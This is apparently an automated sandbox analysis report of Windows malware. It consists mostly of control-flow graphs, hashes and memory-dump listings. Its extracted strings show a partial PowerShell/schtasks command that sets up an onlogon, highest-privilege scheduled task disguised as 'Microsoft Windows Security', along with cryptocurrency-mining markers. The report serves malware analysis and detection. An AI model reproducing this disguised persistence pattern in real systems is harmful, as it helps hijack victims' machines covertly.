                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7e153ebd55e672878444b7a853e8666bad2b783136a00deb19d0ab514e00ff22
                                                                                                                                                                                              • Instruction ID: 283c969184913dca72d129eab53b5591cdca651b2305202ae139f46e893c7960
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e153ebd55e672878444b7a853e8666bad2b783136a00deb19d0ab514e00ff22
                                                                                                                                                                                              • Instruction Fuzzy Hash: 73F05E32A0D5448FD7A4EB4CE4914E877E0EF46730B5500B6E25DC7563DA2AAC44C744
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000022.00000002.3142050242.00007FF7AD1B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF7AD1B0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000022.00000002.3139161836.00007FF7AD1B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000022.00000002.3215892314.00007FF7AD739000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000022.00000002.3215912536.00007FF7AD742000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000022.00000002.3215930328.00007FF7AD745000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000022.00000002.3215949544.00007FF7AD746000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_34_2_7ff7ad1b0000_winupsecvmgr.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                              • Instruction ID: a686bdfabce61223eedb1c978552a0642d50a4d9c3fbc1cb8676e18417c146f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                              • Instruction Fuzzy Hash: FDB012B090E30A94E3093F21E8412587220EB08740FC35030C80C03372EEBC50805731

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 0 7ff7b89b85c0-7ff7b89b86b0 call 7ff7b89ae3d0 call 7ff7b89ad340 5 7ff7b89b86b2-7ff7b89b86d1 call 7ff7b89a14f0 0->5 6 7ff7b89b86d6-7ff7b89b86e5 0->6 5->6 8 7ff7b89b9d21-7ff7b89b9dc7 6->8 9 7ff7b89b86eb-7ff7b89b8761 wcslen 6->9 10 7ff7b89b8763-7ff7b89b8787 call 7ff7b89a14f0 9->10 11 7ff7b89b878c-7ff7b89b8793 9->11 10->11 13 7ff7b89b8799-7ff7b89b8813 11->13 14 7ff7b89b881b-7ff7b89b88db call 7ff7b89a40a8 call 7ff7b89a3360 call 7ff7b89a3c50 memset 11->14 13->14 21 7ff7b89b890d-7ff7b89b891c 14->21 22 7ff7b89b88dd-7ff7b89b8908 call 7ff7b89a14f0 14->22 24 7ff7b89b895e-7ff7b89b898b 21->24 25 7ff7b89b891e-7ff7b89b8956 21->25 22->21 26 7ff7b89b89b6-7ff7b89b89bd 24->26 27 7ff7b89b898d-7ff7b89b89b1 call 7ff7b89a14f0 24->27 25->24 29 7ff7b89b89bf-7ff7b89b89f6 26->29 30 7ff7b89b89fe-7ff7b89b8a59 call 7ff7b89a2b30 call 7ff7b89a2b00 memset 26->30 27->26 29->30 35 7ff7b89b8a8b-7ff7b89b8a92 30->35 36 7ff7b89b8a5b-7ff7b89b8a86 call 7ff7b89a14f0 30->36 38 7ff7b89b8a94-7ff7b89b8ac6 35->38 39 7ff7b89b8acd-7ff7b89b8b6e call 7ff7b89a2b00 memset 35->39 36->35 38->39 42 7ff7b89b8ba0-7ff7b89b8ba7 39->42 43 7ff7b89b8b70-7ff7b89b8b9b call 7ff7b89a14f0 39->43 45 7ff7b89b8c6f-7ff7b89b8d17 call 7ff7b89a2b00 memset 42->45 46 7ff7b89b8bad-7ff7b89b8c67 42->46 43->42 49 7ff7b89b8d49-7ff7b89b8d61 45->49 50 7ff7b89b8d19-7ff7b89b8d44 call 7ff7b89a14f0 45->50 46->45 52 7ff7b89b8d67-7ff7b89b8e16 49->52 53 7ff7b89b8e1e-7ff7b89b8e5a 49->53 50->49 52->53 54 7ff7b89b8e85-7ff7b89b8e8c 53->54 55 7ff7b89b8e5c-7ff7b89b8e80 call 7ff7b89a14f0 53->55 57 7ff7b89b8e8e-7ff7b89b8ed4 54->57 58 7ff7b89b8edc-7ff7b89b8f46 call 7ff7b89a2b30 call 7ff7b89a2b00 memset 54->58 55->54 57->58 63 7ff7b89b8f78-7ff7b89b8f87 58->63 64 7ff7b89b8f48-7ff7b89b8f73 call 7ff7b89a14f0 58->64 66 7ff7b89b8fe9-7ff7b89b9016 63->66 67 7ff7b89b8f89-7ff7b89b8fe1 63->67 64->63 68 7ff7b89b9041-7ff7b89b9048 66->68 69 7ff7b89b9018-7ff7b89b903c call 7ff7b89a14f0 66->69 67->66 71 7ff7b89b907f-7ff7b89b90e2 call 7ff7b89a2b30 call 7ff7b89a2b00 memset 68->71 72 7ff7b89b904a-7ff7b89b9078 68->72 69->68 77 7ff7b89b9114-7ff7b89b911b 71->77 78 7ff7b89b90e4-7ff7b89b910f call 7ff7b89a14f0 71->78 72->71 80 7ff7b89b9156-7ff7b89b91bf call 7ff7b89a2b00 memset 77->80 81 7ff7b89b911d-7ff7b89b914f 77->81 78->77 84 7ff7b89b91f1-7ff7b89b91f8 80->84 85 7ff7b89b91c1-7ff7b89b91ec call 7ff7b89a14f0 80->85 81->80 87 7ff7b89b91fa-7ff7b89b9256 84->87 88 7ff7b89b925e-7ff7b89b9283 call 7ff7b89a2b00 call 7ff7b89a1ea0 84->88 85->84 87->88 93 7ff7b89b92b0-7ff7b89b92b7 88->93 94 7ff7b89b9285-7ff7b89b92ab call 7ff7b89a14f0 88->94 96 7ff7b89b92e0-7ff7b89b9348 93->96 97 7ff7b89b92b9-7ff7b89b92d8 93->97 94->93 98 7ff7b89b9373-7ff7b89b937a 96->98 99 7ff7b89b934a-7ff7b89b936e call 7ff7b89a14f0 96->99 97->96 101 7ff7b89b9422-7ff7b89b94b1 call 7ff7b89a3010 98->101 102 7ff7b89b9380-7ff7b89b941a 98->102 99->98 105 7ff7b89b94b8-7ff7b89b94ce call 7ff7b89a4051 101->105 102->101 108 7ff7b89b94d0-7ff7b89b94ea call 7ff7b89a14f0 105->108 109 7ff7b89b94ef-7ff7b89b94f6 105->109 108->109 111 7ff7b89b950f-7ff7b89b951c _wcsicmp 109->111 112 7ff7b89b94f8-7ff7b89b950b 109->112 113 7ff7b89b9522-7ff7b89b9528 111->113 114 7ff7b89b9810-7ff7b89b9813 call 7ff7b89a2a50 111->114 112->111 113->114 115 7ff7b89b952e-7ff7b89b9533 call 7ff7b89a3310 113->115 118 7ff7b89b9818-7ff7b89b981b 114->118 119 7ff7b89b9538-7ff7b89b9544 115->119 120 7ff7b89b9823-7ff7b89b9844 memcpy 118->120 119->120 121 7ff7b89b954a-7ff7b89b954c 119->121 122 7ff7b89b9846-7ff7b89b9872 memcpy call 7ff7b89a14f0 120->122 123 7ff7b89b9877-7ff7b89b987e 120->123 124 7ff7b89b9557-7ff7b89b957b memcpy 121->124 125 7ff7b89b954e-7ff7b89b9551 121->125 122->123 127 7ff7b89b9884-7ff7b89b9a00 123->127 128 7ff7b89b9a08-7ff7b89b9a19 call 7ff7b89a34f0 123->128 129 7ff7b89b95a8-7ff7b89b95af 124->129 130 7ff7b89b957d-7ff7b89b95a3 memcpy call 7ff7b89a14f0 124->130 125->105 125->124 127->128 138 7ff7b89b9a23-7ff7b89b9a47 memcpy 128->138 139 7ff7b89b9a1b-7ff7b89b9a1d 128->139 131 7ff7b89b95b5-7ff7b89b9720 129->131 132 7ff7b89b9727-7ff7b89b975c call 7ff7b89a2990 129->132 130->129 131->132 140 7ff7b89b9d02-7ff7b89b9d1c call 7ff7b89a31c0 132->140 141 7ff7b89b9762-7ff7b89b976c 132->141 142 7ff7b89b9a49-7ff7b89b9a73 memcpy call 7ff7b89a14f0 138->142 143 7ff7b89b9a78-7ff7b89b9a7f 138->143 139->105 139->138 140->8 145 7ff7b89b97a3-7ff7b89b97aa 141->145 146 7ff7b89b976e-7ff7b89b979e call 7ff7b89a14f0 141->146 142->143 148 7ff7b89b9a81-7ff7b89b9a88 143->148 149 7ff7b89b9ae7-7ff7b89b9b1e call 7ff7b89a2990 143->149 153 7ff7b89b97e8-7ff7b89b9808 call 7ff7b89a2990 145->153 154 7ff7b89b97ac-7ff7b89b97e1 145->154 146->145 155 7ff7b89b9a90-7ff7b89b9ab0 148->155 159 7ff7b89b9b24-7ff7b89b9b8b 149->159 160 7ff7b89b9ce3-7ff7b89b9cfd call 7ff7b89a31c0 149->160 153->105 154->153 155->155 158 7ff7b89b9ab2-7ff7b89b9adf 155->158 158->149 162 7ff7b89b9b91-7ff7b89b9c20 call 7ff7b89a14f0 159->162 163 7ff7b89b9c25-7ff7b89b9c2c 159->163 160->140 162->163 166 7ff7b89b9cc2-7ff7b89b9cd9 call 7ff7b89a2990 163->166 167 7ff7b89b9c32-7ff7b89b9cbb 163->167 170 7ff7b89b9cde 166->170 167->166 170->105
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$memcpy$_wcsicmpwcslen
                                                                                                                                                                                              • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$5RK\E$APPDATA=$SYSTEMROOT=$USERPROFILE=$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\vljmdnomkxppwbqz$\Google\Libs\$\Microsoft Windows Security\winupsecvmgr.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
                                                                                                                                                                                              • API String ID: 1321921031-4262344814
                                                                                                                                                                                              • Opcode ID: b5543baefebd80a1949f10078365f8542758c06a20fd94f67aadc13bba522567
                                                                                                                                                                                              • Instruction ID: 0be5dc71ad1d56155ec16d41dc8795f3aa2914dc4255733d2afe84cf688f27b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: b5543baefebd80a1949f10078365f8542758c06a20fd94f67aadc13bba522567
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BD28711C1C6C395FF12772DA4422F5E3A0AF77786F845231EB8C12769DF2EA1469B28

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 225 7ff7b89a1180-7ff7b89a11ae 226 7ff7b89a1450-7ff7b89a1453 GetStartupInfoA 225->226 227 7ff7b89a11b4-7ff7b89a11d1 225->227 231 7ff7b89a1460-7ff7b89a147a call 7ff7b89b65f0 226->231 228 7ff7b89a11e4-7ff7b89a11ef 227->228 229 7ff7b89a11f1-7ff7b89a11ff 228->229 230 7ff7b89a11d3-7ff7b89a11d6 228->230 234 7ff7b89a1205-7ff7b89a1209 229->234 235 7ff7b89a1407-7ff7b89a1416 call 7ff7b89b65e8 229->235 232 7ff7b89a13f0-7ff7b89a1401 230->232 233 7ff7b89a11dc-7ff7b89a11e1 Sleep 230->233 232->234 232->235 233->228 238 7ff7b89a1480-7ff7b89a1499 call 7ff7b89b6600 234->238 239 7ff7b89a120f-7ff7b89a121e 234->239 242 7ff7b89a1224-7ff7b89a1226 235->242 243 7ff7b89a141c-7ff7b89a1437 _initterm 235->243 251 7ff7b89a149e-7ff7b89a14a6 call 7ff7b89b6630 238->251 239->242 239->243 245 7ff7b89a122c-7ff7b89a1239 242->245 246 7ff7b89a143d-7ff7b89a1442 242->246 243->245 243->246 248 7ff7b89a1247-7ff7b89a128f call 7ff7b89ad7b0 SetUnhandledExceptionFilter call 7ff7b89b6070 call 7ff7b89ad530 call 7ff7b89b6050 245->248 249 7ff7b89a123b-7ff7b89a1243 245->249 246->245 261 7ff7b89a1291 248->261 262 7ff7b89a12a5-7ff7b89a12ab 248->262 249->248 263 7ff7b89a12e7-7ff7b89a12ed 261->263 264 7ff7b89a1293-7ff7b89a1295 262->264 265 7ff7b89a12ad-7ff7b89a12bb 262->265 266 7ff7b89a13d0-7ff7b89a13da 263->266 267 7ff7b89a12f3-7ff7b89a1318 malloc 263->267 268 7ff7b89a12c0-7ff7b89a12c2 264->268 269 7ff7b89a1297-7ff7b89a129a 264->269 270 7ff7b89a12a1 265->270 276 7ff7b89a13e1-7ff7b89a13e7 266->276 277 7ff7b89a13dc 266->277 271 7ff7b89a131a-7ff7b89a1320 267->271 272 7ff7b89a135c-7ff7b89a1390 call 7ff7b89ad340 call 7ff7b89b85c0 267->272 274 7ff7b89a12c4 268->274 275 7ff7b89a12d5-7ff7b89a12de 268->275 269->268 273 7ff7b89a129c 269->273 270->262 278 7ff7b89a1325-7ff7b89a1355 strlen malloc memcpy 271->278 286 7ff7b89a1395-7ff7b89a13a3 272->286 273->270 280 7ff7b89a12e0 274->280 275->280 281 7ff7b89a12d0-7ff7b89a12d3 275->281 276->267 277->276 282 7ff7b89a1322 278->282 283 7ff7b89a1357 278->283 280->263 281->275 281->280 282->278 283->272 286->251 287 7ff7b89a13a9-7ff7b89a13b1 286->287 287->231 288 7ff7b89a13b7-7ff7b89a13c6 287->288
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 649803965-0
                                                                                                                                                                                              • Opcode ID: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                                                                                              • Instruction ID: e603f1605ad9cc15ed7209478661a28b9d086bf32bb42cfceeec5db949afd523
                                                                                                                                                                                              • Opcode Fuzzy Hash: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                                                                                              • Instruction Fuzzy Hash: 74816C35E0860B85EE60AF5DE440379E391AF66B86FC44035DF8E4B399DE3DE4028728

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 171 7ff7b89a1720-7ff7b89a1796 172 7ff7b89a17d5-7ff7b89a17e7 call 7ff7b89a40c6 171->172 175 7ff7b89a17a0-7ff7b89a17cd call 7ff7b89a402d 172->175 176 7ff7b89a17e9-7ff7b89a17eb 172->176 175->172 178 7ff7b89a1e30-7ff7b89a1e3d 176->178 179 7ff7b89a17f1-7ff7b89a1824 176->179 184 7ff7b89a1e50-7ff7b89a1e70 wcslen 178->184 181 7ff7b89a1850-7ff7b89a185e 179->181 182 7ff7b89a1830-7ff7b89a1835 181->182 183 7ff7b89a1860-7ff7b89a1867 181->183 187 7ff7b89a1990-7ff7b89a19b1 call 7ff7b89a4045 182->187 188 7ff7b89a183b-7ff7b89a184a 182->188 185 7ff7b89a18a6-7ff7b89a18ad 183->185 186 7ff7b89a1869-7ff7b89a18a1 call 7ff7b89a14f0 183->186 192 7ff7b89a1e80 184->192 190 7ff7b89a18af-7ff7b89a1904 185->190 191 7ff7b89a190c-7ff7b89a1924 wcsncmp 185->191 186->185 187->192 197 7ff7b89a19b7-7ff7b89a1a1a call 7ff7b89a4075 call 7ff7b89a3c50 memset 187->197 188->181 188->187 190->191 191->182 194 7ff7b89a192a-7ff7b89a1988 call 7ff7b89a405d 191->194 194->182 200 7ff7b89a198e 194->200 204 7ff7b89a1a51-7ff7b89a1a58 197->204 205 7ff7b89a1a1c-7ff7b89a1a4c call 7ff7b89a14f0 197->205 200->187 207 7ff7b89a1a9f-7ff7b89a1acc wcscpy wcscat wcslen 204->207 208 7ff7b89a1a5a-7ff7b89a1a97 204->208 205->204 209 7ff7b89a1ad2-7ff7b89a1af0 wcslen 207->209 210 7ff7b89a1e08-7ff7b89a1e1a 207->210 208->207 211 7ff7b89a1e20-7ff7b89a1e2b 209->211 212 7ff7b89a1af6-7ff7b89a1b02 wcslen 209->212 210->211 210->212 213 7ff7b89a1b07-7ff7b89a1b28 211->213 212->213 213->184 214 7ff7b89a1b2e-7ff7b89a1e00 wcslen * 2 call 7ff7b89a402d * 2 call 7ff7b89a4069 call 7ff7b89a4045 * 2 213->214
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memsetwcsncmp
                                                                                                                                                                                              • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
                                                                                                                                                                                              • API String ID: 1181335886-2264807111
                                                                                                                                                                                              • Opcode ID: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
                                                                                                                                                                                              • Instruction ID: 48c1c221ed70770ef9f69e127e3f3e78d27106870cc3952472aff90a2596fec3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6202C522918BC281EB219B29E4003AAF360FB96795F404335EB9D17BD9DF3DD145CB14

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memsetwcsncmp
                                                                                                                                                                                              • String ID: \BaseNamedObjects\vljmdnomkxppwbqz$eth
                                                                                                                                                                                              • API String ID: 1181335886-3208800472
                                                                                                                                                                                              • Opcode ID: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
                                                                                                                                                                                              • Instruction ID: 48058956792af978a5745fcfb275f6adf24b4df2b2100bb930474b874f8b8a24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01E922B1C64241E620B65AE8007EAE651AF967D1F944231FFCD07BC9CE7CD147C718

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wcslen
                                                                                                                                                                                              • String ID: 0$eth
                                                                                                                                                                                              • API String ID: 4088430540-242559905
                                                                                                                                                                                              • Opcode ID: fefd0b51354c9b27353387df6e592b595b78b00b7a1f0cb1ba5a9e03abdbd47d
                                                                                                                                                                                              • Instruction ID: cb032151ab38987d13a8f72683539b9f2d70449af048a03dca4596cfee9e8f03
                                                                                                                                                                                              • Opcode Fuzzy Hash: fefd0b51354c9b27353387df6e592b595b78b00b7a1f0cb1ba5a9e03abdbd47d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4701D62261869181EB119B54F85079BE760EFC4368FA40335FB9C0BAD9DB3EC5868740

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 352 7ff7b89a1ea0-7ff7b89a1f16 call 7ff7b89b6680 355 7ff7b89a1f43-7ff7b89a1f4a 352->355 356 7ff7b89a1f18-7ff7b89a1f3e memcpy call 7ff7b89a14f0 352->356 358 7ff7b89a1f50-7ff7b89a2086 355->358 359 7ff7b89a208d-7ff7b89a20bb wcslen memcpy 355->359 356->355 358->359 360 7ff7b89a20e8-7ff7b89a20ef 359->360 361 7ff7b89a20bd-7ff7b89a20e3 memcpy call 7ff7b89a14f0 359->361 363 7ff7b89a2232-7ff7b89a2278 360->363 364 7ff7b89a20f5-7ff7b89a222b 360->364 361->360 365 7ff7b89a22cf-7ff7b89a22d6 363->365 366 7ff7b89a227a-7ff7b89a22ca call 7ff7b89a14f0 363->366 364->363 367 7ff7b89a22d8-7ff7b89a2334 365->367 368 7ff7b89a233c-7ff7b89a2375 wcslen 365->368 366->365 367->368 370 7ff7b89a2377-7ff7b89a23c5 call 7ff7b89a14f0 368->370 371 7ff7b89a23ca-7ff7b89a23d1 368->371 370->371 373 7ff7b89a23d3-7ff7b89a242f 371->373 374 7ff7b89a2437-7ff7b89a24a3 call 7ff7b89a40ed 371->374 373->374 377 7ff7b89a2929 374->377 378 7ff7b89a24a9-7ff7b89a24ea 374->378 379 7ff7b89a292b-7ff7b89a2969 377->379 380 7ff7b89a24f3-7ff7b89a2517 call 7ff7b89a40f9 378->380 383 7ff7b89a291f-7ff7b89a2924 call 7ff7b89a3fdf 380->383 384 7ff7b89a251d-7ff7b89a2589 call 7ff7b89a40ed 380->384 383->377 388 7ff7b89a24f0 384->388 389 7ff7b89a258f-7ff7b89a25b6 call 7ff7b89a4114 384->389 388->380 392 7ff7b89a2910-7ff7b89a291a call 7ff7b89a3fdf 389->392 393 7ff7b89a25bc-7ff7b89a25ce 389->393 392->388 394 7ff7b89a2610-7ff7b89a2617 393->394 395 7ff7b89a25d0-7ff7b89a260b call 7ff7b89a14f0 393->395 398 7ff7b89a2686-7ff7b89a269d _wcsnicmp 394->398 399 7ff7b89a2619-7ff7b89a267e 394->399 395->394 401 7ff7b89a26a3-7ff7b89a26aa 398->401 402 7ff7b89a296a-7ff7b89a2983 call 7ff7b89a3fdf * 2 398->402 399->398 404 7ff7b89a26d4-7ff7b89a26db 401->404 405 7ff7b89a26ac-7ff7b89a26cf call 7ff7b89a14f0 401->405 402->379 408 7ff7b89a270c-7ff7b89a2723 _wcsnicmp 404->408 409 7ff7b89a26dd-7ff7b89a2704 404->409 405->404 408->402 410 7ff7b89a2729-7ff7b89a2730 408->410 409->408 412 7ff7b89a2732-7ff7b89a2755 call 7ff7b89a14f0 410->412 413 7ff7b89a275a-7ff7b89a2761 410->413 412->413 416 7ff7b89a2792-7ff7b89a27a9 _wcsnicmp 413->416 417 7ff7b89a2763-7ff7b89a278a 413->417 416->402 418 7ff7b89a27af-7ff7b89a27e4 416->418 417->416 419 7ff7b89a2854-7ff7b89a285b 418->419 420 7ff7b89a27e6-7ff7b89a284f call 7ff7b89a14f0 418->420 422 7ff7b89a2861-7ff7b89a28f4 419->422 423 7ff7b89a28fc-7ff7b89a290e wcsstr 419->423 420->419 422->423 423->392 423->402
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
